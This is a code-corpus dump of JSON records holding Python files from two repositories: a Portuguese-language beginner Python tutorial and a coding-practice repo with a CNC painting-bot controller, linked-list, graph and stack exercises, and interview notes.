"content_id": "1fe37dd12e1c114c9ed069a3a8c5dae3f93ffa71",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 424,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 25,
"path": "/semana-4/convert_python_objects.py",
"repo_name": "rogerio5ouza/python-beginner",
"src_encoding": "UTF-8",
"text": "'''\nPodemos converter objetos de tipos em Python em Strings JSON:\n\n- dict\n- list\n- tuple\n- string\n- int\n- float\n- True\n- False\n- None\n\n'''\nimport json\n\nprint(json.dumps({\"nome\": \"Joao\", \"idade\": 30}))\nprint(json.dumps([\"maca\", \"bananas\"]))\nprint(json.dumps((\"maca\", \"bananas\")))\nprint(json.dumps(\"ola\"))\nprint(json.dumps(42))\nprint(json.dumps(31.76))\nprint(json.dumps(True))\nprint(json.dumps(False))\nprint(json.dumps(None))\n"
},
{
"alpha_fraction": 0.44034773111343384,
"alphanum_fraction": 0.44784173369407654,
"avg_line_length": 42.355262756347656,
"blob_id": "e3e97443e550dc4959579b680b2b79dc951cf4db",
"content_id": "03b4f133cdc599a76896e37d098878796ad7b198",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3351,
"license_type": "no_license",
"max_line_length": 102,
"num_lines": 76,
"path": "/semana-1/data-type.py",
"repo_name": "rogerio5ouza/python-beginner",
"src_encoding": "UTF-8",
"text": "'''\nTipos de Dados (Data Types)\n\nEm programação, Data Types é um importante conceito.\nVariáveis podem armazenar dados de diferentes tipos, e diferentes tipos podem fazer diferentes coisas.\nPython possui os seguintes Data Types embarcaddos por default, nessas categorias:\n'''\n\n# Text Type: str\n# Numeric Types: int, float, complex\n# Sequence Types: list, tuple, range\n# Mapping Type: dict\n# Set Types: set, frozenset\n# Boolean Type: bool\n# Binary Types: bytes, bytearray, memoryview\n\n'''\nObtendo os Data Types\n\nPodemos obter o Data Type de qualquer objeto usando a função type(): \n'''\n\nx = 5\nprint(type(x)) # <class 'int'>\n\n'''\nDefinindo o Data Type\n\nEm Python, o data type é definido quando você atribue um valor para uma variável:\n'''\n\n# x = 'Hello World' Data Type (str):\n\nx = 'Hello World'\nprint(x) # display x \nprint(type(x)) # display the data type of x\n\n# x = 20 Data Type (int):\n# x = 20.5 Data Type (float)\n# x = 1j Data Type (complex)\n# x = ['apple', 'banana', 'cherry'] Data Type (list)\n# x = ('apple', 'banana', 'cherry') Data Type (tuple)\n# x = range(6) Data Type (range)\n# x = {'name' : 'John', 'age' : 32} Data Type (dict)\n# x = {'apple', 'banana', 'cherry'} Data Type (set)\n# x = frozenset({'apple', 'banana', 'cherry'}) Data Type (frozenset)\n# x = True Data Type (bool)\n# x = b'Hello' Data Type (bytes)\n# x = bytearray(5) Data Type (bytearray)\n# x = memoryview(bytes(5)) Data Type (memoryview)\n\n'''\nPodemos ainda, atribuir um específico data type.\n\nSe voçê quer especificar o data type, você pode usar o seguinte construtor de funções:\n'''\n\n# x = str('Hello World') Data Type (str)\n\nx = str('Hello World')\nprint(x) # display x\nprint(type(x)) # display the data type of x \n\n# x = int(20) Data Type (int)\n# x = float(20.5) Data Type (float)\n# x = complex(1j) Data Type (complex)\n# x = list(('apple', 'banana', 'cherry')) Data Type (list)\n# x = tuple(('apple', 'banana', 'cherry')) Data Type (tuple)\n# x = range(6) Data Type (range)\n# x = dict(name='John', age : 32) Data Type (dict)\n# x = set(('apple', 'banana', 'cherry')) Data Type (set)\n# x = frozenset(('apple', 'banana', 'cherry')) Data Type (frozenset)\n# x = boo(5) Data Type (bool)\n# x = bytes(5) Data Type (bytes)\n# x = bytearray(5) Data Type (bytearray)\n# x = memoryview(bytes(5)) Data Type (memoryview) "
},
{
"alpha_fraction": 0.6251649856567383,
"alphanum_fraction": 0.6533216238021851,
"avg_line_length": 17.631147384643555,
"blob_id": "01d2818581d3805e67d9470ddd0144087e4449fc",
"content_id": "d508f18d34a57f2d0bd383efa00caf131c341dc3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2343,
"license_type": "no_license",
"max_line_length": 127,
"num_lines": 122,
"path": "/semana-2/if_else.py",
"repo_name": "rogerio5ouza/python-beginner",
"src_encoding": "UTF-8",
"text": "'''\nIf...Else \n\nO Python suporta as condições usuais lógicas da matemática:\n\n* É iguala: a == b\n* Diferente: a! = B\n* Menor que: a < b\n* Menor ou igual a: a <= b\n* Maior que: a > b\n* Maior que ou Igual a: a >= b \n\nEssas condições podem ser usadas de várias formas, mais comumente em 'instruções if' e loops.\n'''\n# Exemplo:\n\na = 14\nb = 30\nif b > a:\n print('b é maior que a.')\n\n'''\nElif\n\nA palavra-chave Elif é uma forma do Python dizer 'se a condição anterior não for verdadeira, tente esta condição'.\n'''\n# Exemplo:\n\na = 7\nb = 7\nif a > b:\n print('b é maior do que a.')\nelif a == b:\n print('a e b são iguais.')\n\n'''\nElse \n\nO Else captura qualquer coisa que não seja capturada pelas condições anteriores.\n'''\n# Exemplo:\n\na = 20\nb = 10\nif b > a:\n print('b é maior que a.')\nelif a == b:\n print('a e b são iguais.')\nelse:\n print('a é maior que b.')\n\n# Se tivermos apenas uma instrução para executar, podemos colocá-la na mesma linha que o If:\na = 200\nb = 100\n\n# if a > b: print('a é maior que b.')\n\n# Se tivermos apenas uma instrução para executar, uma para If e outra para Else, podemos também colocá-las na mesma linha:\n\na = 500\nb = 1000\nprint('A') if a > b else print('B')\n\n# Podemos ainda colocar várias instruções Else na mesma linha:\n\na = 1000\nb = 1000\nprint('A') if a > b else print('=') if a == b else print('B')\n\n'''\nAND\n\nA palavra-chave AND é um operador lógico usado para comparar instruções condicionais, quando AMBAS condições forem verdadeiras.\n'''\n# Exemplo:\n\na = 100\nb = 55\nc = 300\nif a > b and c > a:\n print('Ambas condições são verdadeiras.')\n\n'''\nOR\n\nA palvra-chave OR é um operador lógico usado para comparar instruções condicionais, qundo UMA das condições for verdadeiras.\n'''\n# Exemplo:\n\na = 100\nb = 55\nc = 300\nif a > b or c > a:\n print('Uma das condições é verdadeira.')\n\n'''\nIF ANINHADO\n\nPodemos ter instruções IF dentro de instruções IF, isso é chamado de intruções IF aninhadas.\n'''\n# Exemplo:\n\nx = 57\n\nif x > 10:\n print('Maior que 10,')\n if x > 20:\n print('e também maior que 20!')\n else:\n print('mas não maior que 60.')\n\n'''\nA declaração PASS\n\nSe por algum motivo tivermos uma instrução IF sem conteúdo, inserimos uma instrução PASS para evitar erros.\n'''\n# Exemplo:\n\na = 30\nb = 100\nif b > a:\n pass\n"
},
{
"alpha_fraction": 0.735733687877655,
"alphanum_fraction": 0.7445651888847351,
"avg_line_length": 23.131147384643555,
"blob_id": "e3154393b9f64c80864360b78494201ef2da081f",
"content_id": "56979d44ed4b9031cf4281e2bf98d0703d973129",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1505,
"license_type": "no_license",
"max_line_length": 112,
"num_lines": 61,
"path": "/semana-4/dates.py",
"repo_name": "rogerio5ouza/python-beginner",
"src_encoding": "UTF-8",
"text": "'''\nDatas\n\nUma data em Python não é um tipo de dado próprio, mas podemos importar um módulo denominado 'datetime' para \ntrabalhar com datas como objetos de data.\n'''\n# Exemplo\n# Importa o módulo 'datetime' e exibe a data atual:\n\nimport datetime\n\nhora_atual = datetime.datetime.now()\nprint(hora_atual)\n\n'''\nDate Output\n\nA data de saída do código acima contém dia-mes-ano e a horário contém hora-minuto-segundo-microssegundo.\n\nO módulo datetime possui muitos métodos para retornar informações sobre o objeto date.\n'''\n\n# Exemplo\n# Retorna o ano e o nome do dia da semana\n\n\ndata_hora_atual = datetime.datetime.now()\n\nprint(data_hora_atual.year)\nprint(data_hora_atual.strftime(\"%A\"))\n\n'''\nCreating Date Objects\n\nPara criar uma data, usamos a classe datetime() (constructor) do módulo datetime.\n\nA classe datetime() requer três parâmetros para criação de uma data: ano, mês, dia.\n'''\n# Exemplo\n\ndata = datetime.datetime(2020, 9, 8)\nprint(data)\n\n'''\nA classe datetime() também usa parâmetros para hora e fuso horário(hora, minuto, segundo, microssegundo, tzone),\nmas eles são opcionais e possuem valor padrão de 0, (Nenhum para fuso horário).\n'''\n\n'''\nMétodo strftime()\n\nO objeto datetime possui um métdodo para formatar objetos de data em strings legíveis.\n\nO método é chamado strtime() e usa um parâmetro, formato, para especificar o foramato de string retornada.\n'''\n\n# Exemplo\n# Mostra o nome do mês:\n\nnome_mes = datetime.datetime(2020, 9, 1)\nprint(nome_mes.strftime(\"%B\"))\n"
},
{
"alpha_fraction": 0.75390625,
"alphanum_fraction": 0.75390625,
"avg_line_length": 22.272727966308594,
"blob_id": "99c047af83f54314710d436caa8745a5d2125fe6",
"content_id": "b6ac65c58b61b7387e2ee22804806115a38748b0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 265,
"license_type": "no_license",
"max_line_length": 110,
"num_lines": 11,
"path": "/semana-4/modules_5.py",
"repo_name": "rogerio5ouza/python-beginner",
"src_encoding": "UTF-8",
"text": "'''\nUso da função dir()\n\nExiste uma função embutida no Python para listar todos os nomes de função(ou nomes de variáveis) em um módulo.\n'''\n# Lista todos os nomes definidos pertencentes ao módulo da plataforma:\n\nimport platform\n\nx = dir(platform)\nprint(x)\n"
},
{
"alpha_fraction": 0.6260781288146973,
"alphanum_fraction": 0.6585489511489868,
"avg_line_length": 14.193798065185547,
"blob_id": "52601dc4532aed67104e6a847bc82c923dbe24c1",
"content_id": "d1cc6449739ac844594ee7fba8571fed3f0e177c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2010,
"license_type": "no_license",
"max_line_length": 117,
"num_lines": 129,
"path": "/semana-1/numbers.py",
"repo_name": "rogerio5ouza/python-beginner",
"src_encoding": "UTF-8",
"text": "'''\nPython Numbers (Números em Ptyhon)\n\nExistem três tipos numéricos em Ptyhon:\n'''\n # int\n # float\n # complex\n\n'''\nVariáveis de tipos numéricos são criadas quando você atribui um valor para elas:\n'''\n\nx = 1 # int\ny = 2.8 # float\nz = 1j # complex\n\n'''\nPara verificar o tipo de qualquer objeto em Python, use a função type():'''\n\nprint (type(x))\nprint (type(y))\nprint (type(z))\n\n'''\nInt\n\nInt, ou inteiro, é um número inteiro, positivo ou negativo, sem decimais, de comprimento ilimitado.\n'''\n# Integers:\n\nx = 1\ny = 35656222554887711\nz = -325522\n\nprint (type(x))\nprint (type(y))\nprint (type(z))\n\n'''\nFloat\n\nFloat ou \"número de ponto flutuante\" é um número, positivo ou negativo, contendo uma ou mais casas decimais.\n'''\n\n# Floats:\n\nx = 1.10\ny = 1.0\nz = 35.59\n\nprint (type(x))\nprint (type(y))\nprint (type(z))\n\n'''\nFloat também pode ser um número científico com um \"e\" para indicar a potência 10.\n'''\n\n# Floats:\n\nx = 35e3\ny = 12E4\nZ = -87.7e100\n\nprint (type(x))\nprint (type(y))\nprint (type(z))\n\n'''\nComplex\n\nNúmeros complexos são escritos com um \"j\" como a parte imaginária:\n'''\n\n# Complex\n\nx = 3+5j\ny = 5j\nz = -5j\n\nprint (type(x))\nprint (type(y))\nprint (type(z))\n\n'''\nType Conversion (Conversão de Tipo)\n\nVoçê pode converter de um tipo para outro com os métodos int(), float() e complex():\n'''\n\n# Converter de um tipo para outro:\n\nx = 1 # int\ny = 2.8 # float\nz = 1j # complex\n\n# converte de int para float:\n\na = float (x)\n\n# converte de float para int:\n\nb = int (y)\n\n# converte de int para complex:\n\nc = complex (x)\n\nprint (a)\nprint (b)\nprint (c)\n\nprint (type(a))\nprint (type(b))\nprint (type(c))\n\n'''\nRandom Number (Número Randômico)\n\nO Python não possui uma função random() para criar um núemro aleatório, mas o Python possui um módulo interno chamado\nramdom que pode ser usado para criar números aleatórios:\n'''\n\n# Importe o módulo aleatório e exiba um número aleatório entre 1 e 9:\n\nimport random\n\nprint (random.randrange(1, 10))\n\n\n\n\n\n\n\n\n\n\n\n"
},
{
"alpha_fraction": 0.6262626051902771,
"alphanum_fraction": 0.6454545259475708,
"avg_line_length": 16.678571701049805,
"blob_id": "b8563368e1f484db2cfb9a2a70332c97bc82cbf6",
"content_id": "59b0148bd5067dd2fc1dd3e072a7cd1ee71689ca",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1017,
"license_type": "no_license",
"max_line_length": 111,
"num_lines": 56,
"path": "/semana-3/while_loops.py",
"repo_name": "rogerio5ouza/python-beginner",
"src_encoding": "UTF-8",
"text": "'''\nPython Loops\n\nO Python possui dois comandos nativos de loop:\n\n - While loops\n - For loops\n'''\n# Com o while loop, podemos executar um conjunto de instruções desde que uma condição seja verdadeira:\n\ni = 1\nwhile i <= 10:\n print(i)\n i += 1\n\n'''\nThe break Statement (Declaração break)\n\nCom o break, podemos parar o loop mesmo se a condição while for verdadeira.\n'''\n# Exemplo:\n\ni = 1\nwhile i <= 10:\n print(i)\n if i == 5:\n break\n i += 1\n\n'''\nThe continue Statement (Declaração continue)\n\nCom a instrução continue, podemos parar a interação atual e continuar com a próxima.\n'''\n# Exemplo:\n\ni = 0\nwhile i < 7:\n i += 1\n if i == 3:\n continue\n print(i)\n\n'''\n The else Statement (Declaração else)\n\n Com a declaração else, podemos executar um bloco de código uma vez, quando a condição não for mais verdadeira.\n'''\n# Imprimi a mensagem quando a condição for false:\n\ni = 1\nwhile i <= 10:\n print(i)\n i += 1\nelse:\n print('i não é menor do que 10')\n"
},
{
"alpha_fraction": 0.6833473443984985,
"alphanum_fraction": 0.6955424547195435,
"avg_line_length": 18.02400016784668,
"blob_id": "b4c9b5b5c01c7846936e4d1408627e64c6dbaa0f",
"content_id": "210a8e5a0eb5daaf00e0f247e5c5400ec4236b1b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2431,
"license_type": "no_license",
"max_line_length": 125,
"num_lines": 125,
"path": "/semana-2/booleans.py",
"repo_name": "rogerio5ouza/python-beginner",
"src_encoding": "UTF-8",
"text": "'''\nPython Booleans\n\nBooleans representa um de dois valores: True ou False.\n\nValores Booleanos\n\nQuando você compara dois valores, a expressão é avaliada e o Python retorna a resposta Booleana.\n'''\n# Exemplo:\n\nprint(10 > 9)\nprint(10 == 9)\nprint(10 < 9)\n\n'''\nQuando executmaos uma condição em uma instrução IF, o Python retorna True ou False.\n'''\n# Exemplo:\n\na = 200\nb = 33\n\nif b > a:\n print('b é maior do que a')\nelse:\n print('b não é maior do que a')\n\n\n'''\nEvaluate Values and Variables (Avaliar valores e variáveis)\n\nA função bool() permite avaliar qualquer valor e retornar True ou False.\n'''\n# Exemplo:\n# Avalia uma string e um número:\n\nprint(bool('Hello'))\nprint(bool(15))\n\n# Avalia duas variáveis:\n\nx = 'Hello'\ny = 15\n\nprint(bool(x))\nprint(bool(y))\n\n'''\nA maioria dos valores é True\n\nQuase todo valor é avaliado como True se tiver algum tipo de conteúdo.\nQualquer cadeia é True, exceto cadeias vazias.\nQualquer número é True, exceto 0.\nQualquer lista, tupla, conjunto e dicionário são True, exceto os vazios.\n'''\n# Exemplo:\nbool('abc')\nbool(123)\nbool(['apple', 'cherry', 'banana'])\n\n'''\nAlguns valores são falsos\n\nDe fato, não há muitos valores avaliados como Falso, exceto valores vazios, como (), [], {}, \"\", o número 0 e o valor Nenhum.\nE claro, o valor Flase avalia como False.\n'''\n# Exemplo:\n\nbool(False)\nbool(None)\nbool(0)\nbool(\"\")\nbool(())\nbool([])\nbool({})\n\n'''\nMais um valor, ou objeto, nesse caso, é avaliado como False, ou seja, se você tiver um objeto que é feito de uma classe com \numa função __len__ que retorna 0 ou False.\n'''\n# Exemplo:\n\n\nclass myclass():\n def __len__(self):\n return 0\n\n\nmyobj = myclass()\nprint(bool(myobj))\n\n# Funções podem retornar um valor Booleano\n# Você pode criar funções que retornem um valor Booleano\n# Exemplo:\n\n\n# def myFunction():\n# return True\n\n\nprint(myFunction())\n\n# Você pode executar o código com base na resposta Booleana de uma fumção.\n# Exemplo: (Imprima 'YES!' se a função retornar True, ou então imprima 'NO!'):\n\n\ndef myFunction():\n return True\n\n\nif myFunction():\n print('YES!')\nelse:\n print('NO!')\n\n'''\nO Python também possui muitas funções internas que retornam um valor Booleano, como a função isintance(),\nque pode ser usada para determinar se um objeto é de um determinado tipo de dados:\n'''\n# Exemplo\n# Verifica se um objeto é um número inteiro ou não:\n\nx = 200\nprint(isinstance(x, int))\n"
}
] | 39 |
flyingfuq/BotRoss
|
https://github.com/flyingfuq/BotRoss
|
6dce11c538ba11a6f0fe9290342d6197d706230f
|
36c9ce2cc943784d8d8336e39269b80a2c16f83b
|
6826ffe4679caa7cb9459102197d970acc4efef6
|
refs/heads/master
| 2020-03-26T17:28:37.993251 | 2018-08-17T18:25:24 | 2018-08-17T18:25:24 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.569343090057373,
"alphanum_fraction": 0.5826535224914551,
"avg_line_length": 39.13793182373047,
"blob_id": "6a323f9a9e990b025c385b416b7de6cd0c8c67bc",
"content_id": "5be1d0da8b2bbb17cf5302e1b920bfbdde1d6fe6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2329,
"license_type": "no_license",
"max_line_length": 98,
"num_lines": 58,
"path": "/bot_ross/brush_cnc.py",
"repo_name": "flyingfuq/BotRoss",
"src_encoding": "UTF-8",
"text": "import defines\nfrom stepper_motor import StepperMotor, StepperMotorDirection # noqa: 402\nfrom switch import Switch\n\n\nclass BrushCNC():\n def __init__(self):\n self._stepper_x = StepperMotor(\n defines.STEPPER_X_1,\n defines.STEPPER_X_2,\n defines.STEPPER_X_3,\n defines.STEPPER_X_4\n )\n self._stepper_y_left = StepperMotor(\n defines.STEPPER_Y_LEFT_1,\n defines.STEPPER_Y_LEFT_2,\n defines.STEPPER_Y_LEFT_3,\n defines.STEPPER_Y_LEFT_4\n )\n self._stepper_y_right = StepperMotor(\n defines.STEPPER_Y_RIGHT_1,\n defines.STEPPER_Y_RIGHT_2,\n defines.STEPPER_Y_RIGHT_3,\n defines.STEPPER_Y_RIGHT_4\n )\n self._stepper_z = StepperMotor(\n defines.STEPPER_Z_1,\n defines.STEPPER_Z_2,\n defines.STEPPER_Z_3,\n defines.STEPPER_Z_4\n )\n self._switch_reset_x = Switch(defines.SWITCH_RESET_X)\n self._switch_reset_y = Switch(defines.SWITCH_RESET_Y)\n self._switch_reset_z = Switch(defines.SWITCH_RESET_Z)\n\n def zeroing(self):\n \"\"\"\n Uses the limit switches for each of the motors to bring them all back to a zeroed position\n \"\"\"\n x_zeroed, y_zeroed, z_zeroed = False, False, False\n self._stepper_x.set_stepper(defines.STEPPER_X_MAX_HZ / 2, -defines.BOARD_X_LENGTH)\n self._stepper_y_left.set_stepper(defines.STEPPER_Y_MAX_HZ / 2, -defines.BOARD_Y_LENGTH)\n self._stepper_y_right.set_stepper(defines.STEPPER_Y_MAX_HZ / 2, -defines.BOARD_Y_LENGTH)\n self._stepper_z.set_stepper(defines.STEPPER_Z_MAX_HZ / 2, -defines.BOARD_Z_LENGTH)\n\n while x_zeroed is False or y_zeroed is False or z_zeroed is False:\n if x_zeroed is False and self._switch_reset_x.get_state() is True:\n self._stepper_x.set_stepper(0, 0)\n x_zeroed = True\n\n if y_zeroed is False and self._switch_reset_y.get_state() is True:\n self._stepper_y_left.set_stepper(0, 0)\n self._stepper_y_right.set_stepper(0, 0)\n y_zeroed = True\n\n if z_zeroed is False and self._switch_reset_z.get_state() is True:\n self._stepper_z.set_stepper(0, 0)\n z_zeroed = True\n\n"
},
{
"alpha_fraction": 0.6177945137023926,
"alphanum_fraction": 0.6729323267936707,
"avg_line_length": 18.950000762939453,
"blob_id": "ad97dd302216fdd557687130cc4d6ba9b660da91",
"content_id": "abd0fe0b25f45d665908bc60457eee381e014355",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 798,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 40,
"path": "/bot_ross/defines.py",
"repo_name": "flyingfuq/BotRoss",
"src_encoding": "UTF-8",
"text": "# General constants\nBOARD_X_LENGTH = -1\nBOARD_Y_LENGTH = -1\nBOARD_Z_LENGTH = -1\n\n# Stepper motor out-channel declarations\nSTEPPER_X_1 = -1\nSTEPPER_X_2 = -1\nSTEPPER_X_3 = -1\nSTEPPER_X_4 = -1\n\nSTEPPER_Y_LEFT_1 = -1\nSTEPPER_Y_LEFT_2 = -1\nSTEPPER_Y_LEFT_3 = -1\nSTEPPER_Y_LEFT_4 = -1\n\nSTEPPER_Y_RIGHT_1 = -1\nSTEPPER_Y_RIGHT_2 = -1\nSTEPPER_Y_RIGHT_3 = -1\nSTEPPER_Y_RIGHT_4 = -1\n\nSTEPPER_Z_1 = -1\nSTEPPER_Z_2 = -1\nSTEPPER_Z_3 = -1\nSTEPPER_Z_4 = -1\n\n# Stepper motor constants\nSTEPPER_X_MAX_HZ = -1.0\nSTEPPER_Y_MAX_HZ = -1.0 # Two y motors conditions are doubled\nSTEPPER_Z_MAX_HZ = -1.0 # The rest of these bad boys, PRESUMABLY have different torques\n\n# Servo motor address declarations\n\n\n# ...eventually\n\n# Switch in-channel declarations\nSWITCH_RESET_X = -1\nSWITCH_RESET_Y = -1\nSWITCH_RESET_Z = -1\n"
}
] | 2 |
bnitin92/coding_practice
|
https://github.com/bnitin92/coding_practice
|
66f2f5997ed1da032bb57d29f992ffc1d9928f38
|
59079552bd3231d10a2c92011ae2602fa1221fcd
|
5583826bf26e6923242242253d4a39644edcc1f0
|
refs/heads/master
| 2023-01-14T07:36:28.859285 | 2020-11-23T02:07:14 | 2020-11-23T02:07:14 | 296,207,923 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.47049808502197266,
"alphanum_fraction": 0.5241379141807556,
"avg_line_length": 16.648649215698242,
"blob_id": "718bdb7c238890e0c38eac49689406a54a13d4f8",
"content_id": "84d5902370fca636d5a0ae236b02c19594c2031e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1363,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 74,
"path": "/Interview1_1/11_11 Recursion.py",
"repo_name": "bnitin92/coding_practice",
"src_encoding": "UTF-8",
"text": "\"\"\"\n/*
Givn a rectangular path in the form of a binary matix, find
the length of the\nlongest possible route form source to
destination, by moving to only nonzero adjacent positions, i.e.
\nroute can be formed from positions having their value as 1.
Note, there should not be any cycles in the output path.
*/\n\"\"\"\n\nimport numpy\n\nM = [[1, 0, 0, 1, 0],\n [1, 1, 0, 0, 0],\n [0, 1, 1, 1, 1],\n [1, 1, 0, 1, 0],\n [1, 1, 1, 1, 0]]\n\n#const start = [0, 0];
const target = [2,4];
\n\n\"\"\"\nprobable solution\n\nalways check the adjacent cells \nif i find 1 replace that cell wiht X in the resulting matrix\nwhile finding if i get x \n\"\"\"\n\ndef rpath(start, target):\n result = [[0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0]]\n\n x = start[0]\n y = start[1]\n\n left = (x-1, y)\n right = (x+1, y)\n up = (x, y+1)\n down = (x, y-1)\n\n if M[]\n dfs()\n\nprint(rpath(0,0))\n\nfunction canGoHere( i, j) {
// out of bounds
if (i < 0 || i > 4) {
return false;
// out of bounds
} else if (j < 0 || j > 4) {
return false;
// already been here
} else if (V[i][j] > 0 ) {
return false;
// no path here in the matrix
} else if (M[i][j] === 0) {
return false;
}
return true;
}"
},
{
"alpha_fraction": 0.558282196521759,
"alphanum_fraction": 0.5828220844268799,
"avg_line_length": 20.766666412353516,
"blob_id": "edc3ae0f9ee6c1108a300008663a85c2e0770e7d",
"content_id": "8e7b5072e9ac044befa82847553e89935add4ded",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 652,
"license_type": "no_license",
"max_line_length": 83,
"num_lines": 30,
"path": "/Linked_List/LC/21. Merge Two Sorted Lists.py",
"repo_name": "bnitin92/coding_practice",
"src_encoding": "UTF-8",
"text": "# Merging 2 sorted linked lists\n\n\"\"\"\nMerge two sorted linked lists and return it as a new sorted list.\n The new list should be made by splicing together the nodes of the first two lists.\n\n\"\"\"\n\nclass ListNode:\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\n\ndef mergeTwoLists(l1, l2):\n # create a dummy node and link the nodes to that\n\n dummy = curr = ListNode()\n\n while l1 and l2:\n if l1.val < l2.val:\n curr.next = l1\n l1 = l1.next\n else:\n curr.next = l2\n l2 = l2.next\n curr = curr.next\n\n curr.next = l1 or l2\n\n return dummy.next"
},
{
"alpha_fraction": 0.622296154499054,
"alphanum_fraction": 0.6439267992973328,
"avg_line_length": 22.115385055541992,
"blob_id": "47e50db1ea58edafd39814b482509d9b49f62fba",
"content_id": "52cb301878044ac44707c3bcb6117639e3d40c7e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 601,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 26,
"path": "/Graphs/LC/1557. Minimum Number of Vertices to Reach All Nodes.py",
"repo_name": "bnitin92/coding_practice",
"src_encoding": "UTF-8",
"text": "# Find the minimum number of vertices to reach all nodes\n\n\"\"\"\n\ninshort we need to find edges without any incomming nodes\n\n\"\"\"\n\n# gives time exceed\n#def findSmallestSetOfVertices(self, n: int, edges: List[List[int]]) -> List[int]:\n# def findSmallestSetOfVertices(n, edges):\n#\n# vertices = [i for i in range(n)]\n#\n# for i in edges:\n# if i[1] in vertices:\n# vertices.remove(i[1])\n#\n# return vertices\n\n\ndef findSmallestSetOfVertices(n, edges):\n return list(set(range(n)) - set(j for i, j in edges))\n\n\nprint(findSmallestSetOfVertices(6, [[0,1],[0,2],[2,5],[3,4],[4,2]]))\n"
},
{
"alpha_fraction": 0.5351034998893738,
"alphanum_fraction": 0.5486048460006714,
"avg_line_length": 23.41758155822754,
"blob_id": "0e824ed9d7c60235091bf9cd45935ce7656aa543",
"content_id": "6491dcd6dba862810a1c8143511d16b2c87b1ee5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2222,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 91,
"path": "/Stacks and Queues/EPI/stack_maxAPI.py",
"repo_name": "bnitin92/coding_practice",
"src_encoding": "UTF-8",
"text": "\n# Stack with a max API\n\n\"\"\"\nbrutforce\nCreate a stack using OOP and another variable to store max\n\n\"\"\"\n\"\"\"\n# Time complexity is O(n) \nclass Stack:\n def __init__(self):\n self.stack = []\n self.maximum = 0 #float(\"-inf\")\n\n def push(self, element):\n self.stack.append(element)\n self.maximum = max(self.maximum, element)\n\n def isEmpty(self):\n return len(self.stack) == 0\n\n def pop(self):\n self.stack.pop()\n self.maximum = max(self.stack)\n\n def maxi(self):\n return self.maximum\n\n\"\"\"\n\n# Another method with extra stack storing object of (max, count)\nclass Stack:\n class MaxWithCount:\n def __init__(self, max, count):\n self.max, self.count = max, count\n\n def __init__(self):\n self._elements = []\n self._cached_max_with_counts = []\n\n def empty(self):\n return len(self._elements) == 0\n\n def max(self):\n if self.empty():\n raise IndexError(\"empty stack\")\n return self._cached_max_with_counts[-1].max\n\n def pop(self):\n if self.empty():\n raise IndexError(\"empty stack\")\n pop_element = self._elements.pop()\n current_max = self._cached_max_with_counts[-1].max\n if current_max == pop_element:\n if self._cached_max_with_counts[-1].count > 1:\n self._cached_max_with_counts[-1].count -= 1\n else:\n self._cached_max_with_counts.pop()\n\n return pop_element\n\n def push(self, x):\n if self.empty():\n self._elements.append(x)\n self._cached_max_with_counts.append(self.MaxWithCount(x, 1))\n else:\n self._elements.append(x)\n if x == self.max():\n self._cached_max_with_counts[-1].count += 1\n if x > self.max():\n self._cached_max_with_counts.append(self.MaxWithCount(x, 1))\n\n def print_stacks(self):\n print(self._elements)\n print(self._cached_max_with_counts)\n\ndef main():\n s1 = Stack()\n #print(s1.max())\n s1.push(1)\n s1.push(5)\n s1.push(4)\n s1.push(7)\n print(s1.max())\n s1.pop()\n print(s1.max())\n s1.push(6)\n print(s1.max())\n s1.print_stacks()\n\nmain()"
},
{
"alpha_fraction": 0.3957446813583374,
"alphanum_fraction": 0.47659575939178467,
"avg_line_length": 13.242424011230469,
"blob_id": "1d77c35bd195ef4ea36f24424dc44247122b456d",
"content_id": "526301559010edb92d92eca4e21c96ecf2750cab",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 470,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 33,
"path": "/Interview1_1/10_28 Recursion.py",
"repo_name": "bnitin92/coding_practice",
"src_encoding": "UTF-8",
"text": "# Power set\n\n\"\"\"\ninput = set (1,2,3) or array --- integers\n\noutput = [[1], [2], [3], [1,2], [2,3], [1,3], [1,2,3]]\n\n\"\"\"\n\n\"\"\"\nsolution:\n\npowerset(array)\n\nreturn = [[]]\n\n1 - res.append([1])\n2 - res.append([1],[2],[1,2])\n3 - res.append([1], [2], [3], [1,2], [2,3], [1,3],[1,2,3]) \nn - append\n\"\"\"\n\ndef powerset(input):\n total = len(input)\n size = total\n res = []\n\n res.append(input)\n size -= 1\n powerset(input[1:])\n\n if len(input) == 0:\n return\n"
},
{
"alpha_fraction": 0.5727553963661194,
"alphanum_fraction": 0.5897833108901978,
"avg_line_length": 22.962963104248047,
"blob_id": "4e86f3d43071a53ded20e2dda036d016e90d4b48",
"content_id": "242ea8f676d38ac6fa451f8245aadcf5879ffb69",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 646,
